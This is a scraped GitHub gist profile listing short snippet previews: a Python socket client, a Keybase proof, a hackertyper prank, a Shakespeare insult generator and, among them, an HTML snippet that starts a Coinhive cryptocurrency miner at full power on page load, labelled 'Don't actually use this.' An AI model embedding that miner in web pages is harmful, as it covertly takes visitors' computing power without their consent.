Skip to content

Instantly share code, notes, and snippets.

View a11ce's full-sized avatar
🐱

sophia a11ce

🐱
View GitHub Profile
import socket
HOST = 'unh.w1mem.com'
PORT = 25001
def recPrint(s):
rec = s.recv(1024)
print(rec)
return(rec)
import socket
HOST = 'unh.w1mem.com'
PORT = 25001
def recPrint(s):
rec = s.recv(1024)
print(rec)
return(rec)
date("l")
@a11ce
a11ce / automatic_coinhive.html
Created January 23, 2018 14:24
Launches coinhive miner at full power on page load. Don't actually use this.
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
var miner = new CoinHive.Anonymous('<YOUR-PUBLIC-SITE-KEY-GOES-HERE');
miner.start();
</script>
@a11ce
a11ce / beetyper.js
Created November 7, 2017 14:01
This goes into the js console on hackertyper.com
Typer.file = "https://gist.githubusercontent.com/ElliotGluck/64b0b814293c09999f765e265aaa2ba1/raw/79f24f9f87654d7ec7c2f6ba83e927852cdbf9a5/gistfile1.txt";
$.get(Typer.file,function(data){
Typer.text=data;
});

Keybase proof

I hereby claim:

  • I am a11ce on github.
  • I am a11ce (https://keybase.io/a11ce) on keybase.
  • I have a public key ASB5_secbqcUevhWAWE8HtAgPZNntAvhQtYi7MMo0nv7Vwo

To claim this, I am signing this object:

@a11ce
a11ce / InsultGen.java
Created April 4, 2017 18:08
Shakespeare Insult Generator
import java.util.ArrayList;
import java.util.Arrays;
import java.util.Random;
public class InsultGen {
static ArrayList<String> adj;
static ArrayList<String> noun;
static Random gen;